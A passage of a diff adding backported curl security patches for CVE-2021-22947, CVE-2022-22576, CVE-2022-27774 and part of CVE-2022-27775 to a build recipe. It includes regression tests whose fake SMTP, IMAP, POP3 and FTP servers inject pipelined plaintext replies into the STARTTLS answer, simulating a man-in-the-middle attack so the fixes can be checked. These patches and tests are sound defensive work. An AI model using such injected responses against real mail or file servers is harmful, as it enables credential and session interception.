++++ b/tests/data/Makefile.inc
+@@ -112,6 +112,8 @@ test945 test946 test947 test948 test949 test950 test951 test952 test953 \
+ test954 test955 test956 test957 test958 test959 test960 test961 test962 \
+ test963 test964 test965 test966 test967 test968 test969 \
+ \
++test984 test985 test986 \
++\
+ test1000 test1001 test1002 test1003 test1004 test1005 test1006 test1007 \
+ test1008 test1009 test1010 test1011 test1012 test1013 test1014 test1015 \
+ test1016 test1017 test1018 test1019 test1020 test1021 test1022 test1023 \
+diff --git a/tests/data/test984 b/tests/data/test984
+new file mode 100644
+index 0000000..e573f23
+--- /dev/null
++++ b/tests/data/test984
+@@ -0,0 +1,56 @@
++<testcase>
++<info>
++<keywords>
++IMAP
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++REPLY CAPABILITY A001 BAD Not implemented
++</servercmd>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++imap
++</server>
++ <name>
++IMAP require STARTTLS with failing capabilities
++ </name>
++ <command>
++imap://%HOSTIP:%IMAPPORT/%TESTNUMBER -T log/upload%TESTNUMBER -u user:secret --ssl-reqd
++</command>
++<file name="log/upload%TESTNUMBER">
++Date: Mon, 7 Feb 1994 21:52:25 -0800 (PST)
++From: Fred Foobar <foobar@example.COM>
++Subject: afternoon meeting
++To: joe@example.com
++Message-Id: <B27397-0100000@example.COM>
++MIME-Version: 1.0
++Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
++
++Hello Joe, do you think we can meet at 3:30 tomorrow?
++</file>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++# 64 is CURLE_USE_SSL_FAILED
++<errorcode>
++64
++</errorcode>
++<protocol>
++A001 CAPABILITY
++</protocol>
++</verify>
++</testcase>
+diff --git a/tests/data/test985 b/tests/data/test985
+new file mode 100644
+index 0000000..d0db4aa
+--- /dev/null
++++ b/tests/data/test985
+@@ -0,0 +1,54 @@
++<testcase>
++<info>
++<keywords>
++POP3
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++REPLY CAPA -ERR Not implemented
++</servercmd>
++<data nocheck="yes">
++From: me@somewhere
++To: fake@nowhere
++
++body
++
++--
++ yours sincerely
++</data>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++pop3
++</server>
++ <name>
++POP3 require STARTTLS with failing capabilities
++ </name>
++ <command>
++pop3://%HOSTIP:%POP3PORT/%TESTNUMBER -u user:secret --ssl-reqd
++ </command>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++# 64 is CURLE_USE_SSL_FAILED
++<errorcode>
++64
++</errorcode>
++<protocol>
++CAPA
++</protocol>
++</verify>
++</testcase>
+diff --git a/tests/data/test986 b/tests/data/test986
+new file mode 100644
+index 0000000..a709437
+--- /dev/null
++++ b/tests/data/test986
+@@ -0,0 +1,53 @@
++<testcase>
++<info>
++<keywords>
++FTP
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++REPLY welcome 230 Welcome
++REPLY AUTH 500 unknown command
++</servercmd>
++</reply>
++
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++ftp
++</server>
++ <name>
++FTP require STARTTLS while preauthenticated
++ </name>
++<file name="log/test%TESTNUMBER.txt">
++data
++ to
++ see
++that FTPS
++works
++ so does it?
++</file>
++ <command>
++--ssl-reqd --ftp-ssl-control ftp://%HOSTIP:%FTPPORT/%TESTNUMBER -T log/test%TESTNUMBER.txt -u user:secret
++</command>
++</client>
++
++# Verify data after the test has been "shot"
++<verify>
++# 64 is CURLE_USE_SSL_FAILED
++<errorcode>
++64
++</errorcode>
++<protocol>
++AUTH SSL
++AUTH TLS
++</protocol>
++</verify>
++</testcase>
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22947.patch b/meta/recipes-support/curl/curl/CVE-2021-22947.patch
new file mode 100644
index 0000000000..070a328e27
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22947.patch
@@ -0,0 +1,352 @@
+Backport of:
+
+From 259b4f2e1fd01fbc55e569ee0a507afeae34f77c Mon Sep 17 00:00:00 2001
+From: Patrick Monnerat <patrick@monnerat.net>
+Date: Tue, 7 Sep 2021 13:26:42 +0200
+Subject: [PATCH] ftp,imap,pop3,smtp: reject STARTTLS server response
+ pipelining
+
+If a server pipelines future responses within the STARTTLS response, the
+former are preserved in the pingpong cache across TLS negotiation and
+used as responses to the encrypted commands.
+
+This fix detects pipelined STARTTLS responses and rejects them with an
+error.
+
+Bug: https://curl.se/docs/CVE-2021-22947.html
+Upstream-Status: backport from 7.68.0-1ubuntu2.7
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+CVE: CVE-2021-22947
+
+---
+ lib/ftp.c | 3 +++
+ lib/imap.c | 4 +++
+ lib/pop3.c | 4 +++
+ lib/smtp.c | 4 +++
+ tests/data/Makefile.inc | 2 ++
+ tests/data/test980 | 52 ++++++++++++++++++++++++++++++++++++
+ tests/data/test981 | 59 +++++++++++++++++++++++++++++++++++++++++
+ tests/data/test982 | 57 +++++++++++++++++++++++++++++++++++++++
+ tests/data/test983 | 52 ++++++++++++++++++++++++++++++++++++
+ 9 files changed, 237 insertions(+)
+ create mode 100644 tests/data/test980
+ create mode 100644 tests/data/test981
+ create mode 100644 tests/data/test982
+ create mode 100644 tests/data/test983
+
+diff --git a/lib/ftp.c b/lib/ftp.c
+index 91b43d8..31a34e8 100644
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -2670,6 +2670,9 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
+ case FTP_AUTH:
+ /* we have gotten the response to a previous AUTH command */
+
++ if(pp->cache_size)
++ return CURLE_WEIRD_SERVER_REPLY; /* Forbid pipelining in response. */
++
+ /* RFC2228 (page 5) says:
+ *
+ * If the server is willing to accept the named security mechanism,
+diff --git a/lib/imap.c b/lib/imap.c
+index 9880ce1..0ca700f 100644
+--- a/lib/imap.c
++++ b/lib/imap.c
+@@ -946,6 +946,10 @@ static CURLcode imap_state_starttls_resp(struct connectdata *conn,
+
+ (void)instate; /* no use for this yet */
+
++ /* Pipelining in response is forbidden. */
++ if(data->conn->proto.imapc.pp.cache_size)
++ return CURLE_WEIRD_SERVER_REPLY;
++
+ if(imapcode != IMAP_RESP_OK) {
+ if(data->set.use_ssl != CURLUSESSL_TRY) {
+ failf(data, "STARTTLS denied");
+diff --git a/lib/pop3.c b/lib/pop3.c
+index 145b2b4..8a2d52e 100644
+--- a/lib/pop3.c
++++ b/lib/pop3.c
+@@ -753,6 +753,10 @@ static CURLcode pop3_state_starttls_resp(struct connectdata *conn,
+
+ (void)instate; /* no use for this yet */
+
++ /* Pipelining in response is forbidden. */
++ if(data->conn->proto.pop3c.pp.cache_size)
++ return CURLE_WEIRD_SERVER_REPLY;
++
+ if(pop3code != '+') {
+ if(data->set.use_ssl != CURLUSESSL_TRY) {
+ failf(data, "STARTTLS denied");
+diff --git a/lib/smtp.c b/lib/smtp.c
+index e187287..66183e2 100644
+--- a/lib/smtp.c
++++ b/lib/smtp.c
+@@ -820,6 +820,10 @@ static CURLcode smtp_state_starttls_resp(struct connectdata *conn,
+
+ (void)instate; /* no use for this yet */
+
++ /* Pipelining in response is forbidden. */
++ if(data->conn->proto.smtpc.pp.cache_size)
++ return CURLE_WEIRD_SERVER_REPLY;
++
+ if(smtpcode != 220) {
+ if(data->set.use_ssl != CURLUSESSL_TRY) {
+ failf(data, "STARTTLS denied, code %d", smtpcode);
+diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
+index 0fa6799..60e8176 100644
+--- a/tests/data/Makefile.inc
++++ b/tests/data/Makefile.inc
+@@ -112,6 +112,8 @@ test945 test946 test947 test948 test949 test950 test951 test952 test953 \
+ test954 test955 test956 test957 test958 test959 test960 test961 test962 \
+ test963 test964 test965 test966 test967 test968 test969 \
+ \
++test980 test981 test982 test983 \
++\
+ test984 test985 test986 \
+ \
+ test1000 test1001 test1002 test1003 test1004 test1005 test1006 test1007 \
+diff --git a/tests/data/test980 b/tests/data/test980
+new file mode 100644
+index 0000000..97567f8
+--- /dev/null
++++ b/tests/data/test980
+@@ -0,0 +1,52 @@
++<testcase>
++<info>
++<keywords>
++SMTP
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++CAPA STARTTLS
++AUTH PLAIN
++REPLY STARTTLS 454 currently unavailable\r\n235 Authenticated\r\n250 2.1.0 Sender ok\r\n250 2.1.5 Recipient ok\r\n354 Enter mail\r\n250 2.0.0 Accepted
++REPLY AUTH 535 5.7.8 Authentication credentials invalid
++</servercmd>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++smtp
++</server>
++ <name>
++SMTP STARTTLS pipelined server response
++ </name>
++<stdin>
++mail body
++</stdin>
++ <command>
++smtp://%HOSTIP:%SMTPPORT/%TESTNUMBER --mail-rcpt recipient@example.com --mail-from sender@example.com -u user:secret --ssl --sasl-ir -T -
++</command>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++# 8 is CURLE_WEIRD_SERVER_REPLY
++<errorcode>
++8
++</errorcode>
++<protocol>
++EHLO %TESTNUMBER
++STARTTLS
++</protocol>
++</verify>
++</testcase>
+diff --git a/tests/data/test981 b/tests/data/test981
+new file mode 100644
+index 0000000..2b98ce4
+--- /dev/null
++++ b/tests/data/test981
+@@ -0,0 +1,59 @@
++<testcase>
++<info>
++<keywords>
++IMAP
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++CAPA STARTTLS
++REPLY STARTTLS A002 BAD currently unavailable\r\nA003 OK Authenticated\r\nA004 OK Accepted
++REPLY LOGIN A003 BAD Authentication credentials invalid
++</servercmd>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++imap
++</server>
++ <name>
++IMAP STARTTLS pipelined server response
++ </name>
++ <command>
++imap://%HOSTIP:%IMAPPORT/%TESTNUMBER -T log/upload%TESTNUMBER -u user:secret --ssl
++</command>
++<file name="log/upload%TESTNUMBER">
++Date: Mon, 7 Feb 1994 21:52:25 -0800 (PST)
++From: Fred Foobar <foobar@example.COM>
++Subject: afternoon meeting
++To: joe@example.com
++Message-Id: <B27397-0100000@example.COM>
++MIME-Version: 1.0
++Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
++
++Hello Joe, do you think we can meet at 3:30 tomorrow?
++</file>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++# 8 is CURLE_WEIRD_SERVER_REPLY
++<errorcode>
++8
++</errorcode>
++<protocol>
++A001 CAPABILITY
++A002 STARTTLS
++</protocol>
++</verify>
++</testcase>
+diff --git a/tests/data/test982 b/tests/data/test982
+new file mode 100644
+index 0000000..9e07cc0
+--- /dev/null
++++ b/tests/data/test982
+@@ -0,0 +1,57 @@
++<testcase>
++<info>
++<keywords>
++POP3
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++CAPA STLS USER
++REPLY STLS -ERR currently unavailable\r\n+OK user accepted\r\n+OK authenticated
++REPLY PASS -ERR Authentication credentials invalid
++</servercmd>
++<data nocheck="yes">
++From: me@somewhere
++To: fake@nowhere
++
++body
++
++--
++ yours sincerely
++</data>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++pop3
++</server>
++ <name>
++POP3 STARTTLS pipelined server response
++ </name>
++ <command>
++pop3://%HOSTIP:%POP3PORT/%TESTNUMBER -u user:secret --ssl
++ </command>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++# 8 is CURLE_WEIRD_SERVER_REPLY
++<errorcode>
++8
++</errorcode>
++<protocol>
++CAPA
++STLS
++</protocol>
++</verify>
++</testcase>
+diff --git a/tests/data/test983 b/tests/data/test983
+new file mode 100644
+index 0000000..300ec45
+--- /dev/null
++++ b/tests/data/test983
+@@ -0,0 +1,52 @@
++<testcase>
++<info>
++<keywords>
++FTP
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++REPLY AUTH 500 unknown command\r\n500 unknown command\r\n331 give password\r\n230 Authenticated\r\n257 "/"\r\n200 OK\r\n200 OK\r\n200 OK\r\n226 Transfer complete
++REPLY PASS 530 Login incorrect
++</servercmd>
++</reply>
++
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++ftp
++</server>
++ <name>
++FTP STARTTLS pipelined server response
++ </name>
++<file name="log/test%TESTNUMBER.txt">
++data
++ to
++ see
++that FTPS
++works
++ so does it?
++</file>
++ <command>
++--ssl --ftp-ssl-control ftp://%HOSTIP:%FTPPORT/%TESTNUMBER -T log/test%TESTNUMBER.txt -u user:secret -P %CLIENTIP
++</command>
++</client>
++
++# Verify data after the test has been "shot"
++<verify>
++# 8 is CURLE_WEIRD_SERVER_REPLY
++<errorcode>
++8
++</errorcode>
++<protocol>
++AUTH SSL
++</protocol>
++</verify>
++</testcase>
diff --git a/meta/recipes-support/curl/curl/CVE-2022-22576.patch b/meta/recipes-support/curl/curl/CVE-2022-22576.patch
new file mode 100644
index 0000000000..13479e7f0e
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-22576.patch
@@ -0,0 +1,148 @@
+From 852aa5ad351ea53e5f01d2f44b5b4370c2bf5425 Mon Sep 17 00:00:00 2001
+From: Patrick Monnerat <patrick@monnerat.net>
+Date: Mon, 25 Apr 2022 11:44:05 +0200
+Subject: [PATCH] url: check sasl additional parameters for connection reuse.
+
+Also move static function safecmp() as non-static Curl_safecmp() since
+its purpose is needed at several places.
+
+Bug: https://curl.se/docs/CVE-2022-22576.html
+
+CVE-2022-22576
+
+Closes #8746
+---
+ lib/strcase.c | 10 ++++++++++
+ lib/strcase.h | 2 ++
+ lib/url.c | 13 ++++++++++++-
+ lib/urldata.h | 1 +
+ lib/vtls/vtls.c | 21 ++++++---------------
+ 5 files changed, 31 insertions(+), 16 deletions(-)
+
+CVE: CVE-2022-22576
+Upstream-Status: Backport [https://github.com/curl/curl/commit/852aa5ad351ea53e5f01d2f44b5b4370c2bf5425.patch]
+Comment: Refreshed patch
+Signed-off-by: Sana.Kazi <Sana.Kazi@kpit.com>
+
+diff --git a/lib/strcase.c b/lib/strcase.c
+index dd46ca1ba0e5..692a3f14aee7 100644
+--- a/lib/strcase.c
++++ b/lib/strcase.c
+@@ -251,6 +251,16 @@
+ } while(*src++ && --n);
+ }
+
++/* Compare case-sensitive NUL-terminated strings, taking care of possible
++ * null pointers. Return true if arguments match.
++ */
++bool Curl_safecmp(char *a, char *b)
++{
++ if(a && b)
++ return !strcmp(a, b);
++ return !a && !b;
++}
++
+ /* --- public functions --- */
+
+ int curl_strequal(const char *first, const char *second)
+diff --git a/lib/strcase.h b/lib/strcase.h
+index b234d3815220..2635f5117e99 100644
+--- a/lib/strcase.h
++++ b/lib/strcase.h
+@@ -48,4 +48,6 @@
+ void Curl_strntoupper(char *dest, const char *src, size_t n);
+ void Curl_strntolower(char *dest, const char *src, size_t n);
+
++bool Curl_safecmp(char *a, char *b);
++
+ #endif /* HEADER_CURL_STRCASE_H */
+diff --git a/lib/url.c b/lib/url.c
+index 9a988b4d58d8..e1647b133854 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -730,6 +730,7 @@
+ Curl_safefree(conn->allocptr.host);
+ Curl_safefree(conn->allocptr.cookiehost);
+ Curl_safefree(conn->allocptr.rtsp_transport);
++ Curl_safefree(conn->oauth_bearer);
+ Curl_safefree(conn->trailer);
+ Curl_safefree(conn->host.rawalloc); /* host name buffer */
+ Curl_safefree(conn->conn_to_host.rawalloc); /* host name buffer */
+@@ -1251,7 +1252,9 @@
+ /* This protocol requires credentials per connection,
+ so verify that we're using the same name and password as well */
+ if(strcmp(needle->user, check->user) ||
+- strcmp(needle->passwd, check->passwd)) {
++ strcmp(needle->passwd, check->passwd) ||
++ !Curl_safecmp(needle->sasl_authzid, check->sasl_authzid) ||
++ !Curl_safecmp(needle->oauth_bearer, check->oauth_bearer)) {
+ /* one of them was different */
+ continue;
+ }
+@@ -3392,6 +3395,14 @@
+ result = CURLE_OUT_OF_MEMORY;
+ goto out;
+ }
++ }
++
++ if(data->set.str[STRING_BEARER]) {
++ conn->oauth_bearer = strdup(data->set.str[STRING_BEARER]);
++ if(!conn->oauth_bearer) {
++ result = CURLE_OUT_OF_MEMORY;
++ goto out;
++ }
+ }
+
+ #ifdef USE_UNIX_SOCKETS
+diff --git a/lib/urldata.h b/lib/urldata.h
+index 07eb19b87034..1d89b8d7fa68 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -949,6 +949,8 @@
+
+ char *sasl_authzid; /* authorisation identity string, allocated */
+
++ char *oauth_bearer; /* OAUTH2 bearer, allocated */
++
+ int httpversion; /* the HTTP version*10 reported by the server */
+ int rtspversion; /* the RTSP version*10 reported by the server */
+
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index 03b85ba065e5..a40ac06f684f 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -82,15 +82,6 @@
+ else \
+ dest->var = NULL;
+
+-static bool safecmp(char *a, char *b)
+-{
+- if(a && b)
+- return !strcmp(a, b);
+- else if(!a && !b)
+- return TRUE; /* match */
+- return FALSE; /* no match */
+-}
+-
+
+ bool
+ Curl_ssl_config_matches(struct ssl_primary_config* data,
+@@ -101,12 +101,12 @@
+ (data->verifypeer == needle->verifypeer) &&
+ (data->verifyhost == needle->verifyhost) &&
+ (data->verifystatus == needle->verifystatus) &&
+- safecmp(data->CApath, needle->CApath) &&
+- safecmp(data->CAfile, needle->CAfile) &&
+- safecmp(data->issuercert, needle->issuercert) &&
+- safecmp(data->clientcert, needle->clientcert) &&
+- safecmp(data->random_file, needle->random_file) &&
+- safecmp(data->egdsocket, needle->egdsocket) &&
++ Curl_safecmp(data->CApath, needle->CApath) &&
++ Curl_safecmp(data->CAfile, needle->CAfile) &&
++ Curl_safecmp(data->issuercert, needle->issuercert) &&
++ Curl_safecmp(data->clientcert, needle->clientcert) &&
++ Curl_safecmp(data->random_file, needle->random_file) &&
++ Curl_safecmp(data->egdsocket, needle->egdsocket) &&
+ Curl_safe_strcasecompare(data->cipher_list, needle->cipher_list) &&
+ Curl_safe_strcasecompare(data->cipher_list13, needle->cipher_list13) &&
+ Curl_safe_strcasecompare(data->pinned_key, needle->pinned_key))
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27774-1.patch b/meta/recipes-support/curl/curl/CVE-2022-27774-1.patch
new file mode 100644
index 0000000000..063c11712a
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-1.patch
@@ -0,0 +1,45 @@
+From 2a797e099731facf62a2c675396334bc2ad3bc7c Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 16:24:33 +0200
+Subject: [PATCH] connect: store "conn_remote_port" in the info struct
+
+To make it available after the connection ended.
+
+Prerequisite for the patches that address CVE-2022-27774.
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/08b8ef4e726ba10f45081ecda5b3cea788d3c839]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/connect.c | 1 +
+ lib/urldata.h | 6 +++++-
+ 2 files changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/lib/connect.c b/lib/connect.c
+index b3d4057..a977d67 100644
+--- a/lib/connect.c
++++ b/lib/connect.c
+@@ -624,6 +624,7 @@ void Curl_persistconninfo(struct connectdata *conn)
+ conn->data->info.conn_scheme = conn->handler->scheme;
+ conn->data->info.conn_protocol = conn->handler->protocol;
+ conn->data->info.conn_primary_port = conn->primary_port;
++ conn->data->info.conn_remote_port = conn->remote_port;
+ conn->data->info.conn_local_port = conn->local_port;
+ }
+
+diff --git a/lib/urldata.h b/lib/urldata.h
+index fafb7a3..ab1b267 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1148,7 +1148,11 @@ struct PureInfo {
+ reused, in the connection cache. */
+
+ char conn_primary_ip[MAX_IPADR_LEN];
+- long conn_primary_port;
++ long conn_primary_port; /* this is the destination port to the connection,
++ which might have been a proxy */
++ long conn_remote_port; /* this is the "remote port", which is the port
++ number of the used URL, independent of proxy or
++ not */
+ char conn_local_ip[MAX_IPADR_LEN];
+ long conn_local_port;
+ const char *conn_scheme;
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27774-2.patch b/meta/recipes-support/curl/curl/CVE-2022-27774-2.patch
new file mode 100644
index 0000000000..c64d614194
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-2.patch
@@ -0,0 +1,80 @@
+From 5c2f3b3a5f115625134669d90d591de9c5aafc8e Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 16:24:33 +0200
+Subject: [PATCH] transfer: redirects to other protocols or ports clear auth
+
+... unless explicitly permitted.
+
+Bug: https://curl.se/docs/CVE-2022-27774.html
+Reported-by: Harry Sintonen
+Closes #8748
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/620ea21410030a9977396b4661806bc187231b79]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/transfer.c | 49 ++++++++++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 48 insertions(+), 1 deletion(-)
+
+diff --git a/lib/transfer.c b/lib/transfer.c
+index 744e1c0..ac69d27 100644
+--- a/lib/transfer.c
++++ b/lib/transfer.c
+@@ -1627,10 +1627,57 @@ CURLcode Curl_follow(struct Curl_easy *data,
+ return CURLE_OUT_OF_MEMORY;
+ }
+ else {
+-
+ uc = curl_url_get(data->state.uh, CURLUPART_URL, &newurl, 0);
+ if(uc)
+ return Curl_uc_to_curlcode(uc);
++
++ /* Clear auth if this redirects to a different port number or protocol,
++ unless permitted */
++ if(!data->set.allow_auth_to_other_hosts && (type != FOLLOW_FAKE)) {
++ char *portnum;
++ int port;
++ bool clear = FALSE;
++
++ if(data->set.use_port && data->state.allow_port)
++ /* a custom port is used */
++ port = (int)data->set.use_port;
++ else {
++ uc = curl_url_get(data->state.uh, CURLUPART_PORT, &portnum,
++ CURLU_DEFAULT_PORT);
++ if(uc) {
++ free(newurl);
++ return Curl_uc_to_curlcode(uc);
++ }
++ port = atoi(portnum);
++ free(portnum);
++ }
++ if(port != data->info.conn_remote_port) {
++ infof(data, "Clear auth, redirects to port from %u to %u",
++ data->info.conn_remote_port, port);
++ clear = TRUE;
++ }
++ else {
++ char *scheme;
++ const struct Curl_handler *p;
++ uc = curl_url_get(data->state.uh, CURLUPART_SCHEME, &scheme, 0);
++ if(uc) {
++ free(newurl);
++ return Curl_uc_to_curlcode(uc);
++ }
++
++ p = Curl_builtin_scheme(scheme);
++ if(p && (p->protocol != data->info.conn_protocol)) {
++ infof(data, "Clear auth, redirects scheme from %s to %s",
++ data->info.conn_scheme, scheme);
++ clear = TRUE;
++ }
++ free(scheme);
++ }
++ if(clear) {
++ Curl_safefree(data->set.str[STRING_USERNAME]);
++ Curl_safefree(data->set.str[STRING_PASSWORD]);
++ }
++ }
+ }
+
+ if(type == FOLLOW_FAKE) {
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27774-3.patch b/meta/recipes-support/curl/curl/CVE-2022-27774-3.patch
new file mode 100644
index 0000000000..a585f6a8fa
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-3.patch
@@ -0,0 +1,83 @@
+From 5dccf21ad49eed925e8f76b0cb844877239ce23d Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 17:59:15 +0200
+Subject: [PATCH] openssl: don't leak the SRP credentials in redirects either
+
+Follow-up to 620ea21410030
+
+Reported-by: Harry Sintonen
+Closes #8751
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/139a54ed0a172adaaf1a78d6f4fff50b2c3f9e08]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/http.c | 10 +++++-----
+ lib/http.h | 6 ++++++
+ lib/vtls/openssl.c | 3 ++-
+ 3 files changed, 13 insertions(+), 6 deletions(-)
+
+diff --git a/lib/http.c b/lib/http.c
+index 8b16c09..5291c07 100644
+--- a/lib/http.c
++++ b/lib/http.c
+@@ -732,10 +732,10 @@ output_auth_headers(struct connectdata *conn,
+ }
+
+ /*
+- * allow_auth_to_host() tells if autentication, cookies or other "sensitive
+- * data" can (still) be sent to this host.
++ * Curl_allow_auth_to_host() tells if authentication, cookies or other
++ * "sensitive data" can (still) be sent to this host.
+ */
+-static bool allow_auth_to_host(struct Curl_easy *data)
++bool Curl_allow_auth_to_host(struct Curl_easy *data)
+ {
+ struct connectdata *conn = data->conn;
+ return (!data->state.this_is_a_follow ||
+@@ -816,7 +816,7 @@ Curl_http_output_auth(struct connectdata *conn,
+
+ /* To prevent the user+password to get sent to other than the original host
+ due to a location-follow */
+- if(allow_auth_to_host(data)
++ if(Curl_allow_auth_to_host(data)
+ || conn->bits.netrc
+ )
+ result = output_auth_headers(conn, authhost, request, path, FALSE);
+@@ -1891,7 +1891,7 @@ CURLcode Curl_add_custom_headers(struct connectdata *conn,
+ checkprefix("Cookie:", compare)) &&
+ /* be careful of sending this potentially sensitive header to
+ other hosts */
+- !allow_auth_to_host(data))
++ !Curl_allow_auth_to_host(data))
+ ;
+ else {
+ result = Curl_add_bufferf(&req_buffer, "%s\r\n", compare);
+diff --git a/lib/http.h b/lib/http.h
+index 4c1825f..4fbae1d 100644
+--- a/lib/http.h
++++ b/lib/http.h
+@@ -273,4 +273,10 @@ Curl_http_output_auth(struct connectdata *conn,
+ bool proxytunnel); /* TRUE if this is the request setting
+ up the proxy tunnel */
+
++/*
++ * Curl_allow_auth_to_host() tells if authentication, cookies or other
++ * "sensitive data" can (still) be sent to this host.
++ */
++bool Curl_allow_auth_to_host(struct Curl_easy *data);
++
+ #endif /* HEADER_CURL_HTTP_H */
+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
+index 006a8c8..a14cecc 100644
+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -2739,7 +2739,8 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
+ #endif
+
+ #ifdef USE_TLS_SRP
+- if(ssl_authtype == CURL_TLSAUTH_SRP) {
++ if((ssl_authtype == CURL_TLSAUTH_SRP) &&
++ Curl_allow_auth_to_host(data)) {
+ char * const ssl_username = SSL_SET_OPTION(username);
+
+ infof(data, "Using TLS-SRP username: %s\n", ssl_username);
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27774-4.patch b/meta/recipes-support/curl/curl/CVE-2022-27774-4.patch
new file mode 100644
index 0000000000..2258681cab
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-4.patch
@@ -0,0 +1,35 @@
+From 7395752e2f7b87dc8c8f2a7137075e2da554aaea Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Tue, 26 Apr 2022 07:46:19 +0200
+Subject: [PATCH] gnutls: don't leak the SRP credentials in redirects
+
+Follow-up to 620ea21410030 and 139a54ed0a172a
+
+Reported-by: Harry Sintonen
+Closes #8752
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/093531556203decd92d92bccd431edbe5561781c]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/vtls/gtls.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
+index 8c05102..3d0758d 100644
+--- a/lib/vtls/gtls.c
++++ b/lib/vtls/gtls.c
+@@ -581,11 +581,11 @@ gtls_connect_step1(struct connectdata *conn,
+ }
+
+ #ifdef USE_TLS_SRP
+- if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) {
++ if((SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) &&
++ Curl_allow_auth_to_host(data)) {
+ infof(data, "Using TLS-SRP username: %s\n", SSL_SET_OPTION(username));
+
+- rc = gnutls_srp_allocate_client_credentials(
+- &BACKEND->srp_client_cred);
++ rc = gnutls_srp_allocate_client_credentials(&BACKEND->srp_client_cred);
+ if(rc != GNUTLS_E_SUCCESS) {
+ failf(data, "gnutls_srp_allocate_client_cred() failed: %s",
+ gnutls_strerror(rc));
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27775.patch b/meta/recipes-support/curl/curl/CVE-2022-27775.patch
new file mode 100644
index 0000000000..b3fe7b4494
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27775.patch
@@ -0,0 +1,39 @@
+From 058f98dc3fe595f21dc26a5b9b1699e519ba5705 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 11:48:00 +0200
+Subject: [PATCH] conncache: include the zone id in the "bundle" hashkey
+
+Make connections to two separate IPv6 zone ids create separate
+connections.
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2022-27775.html
+Closes #8747
+---
+ lib/conncache.c | 8 ++++++--
+ 1 file changed, 6 insertions(+), 2 deletions(-)
+
+CVE: CVE-2022-27775
+Upstream-Status: Backport [https://github.com/curl/curl/commit/058f98dc3fe595f21dc26a5b9b1699e519ba5705.patch]
+Comment: Refreshed patch
+Signed-off-by: Sana.Kazi <Sana.Kazi@kpit.com>
+
+diff --git a/lib/conncache.c b/lib/conncache.c
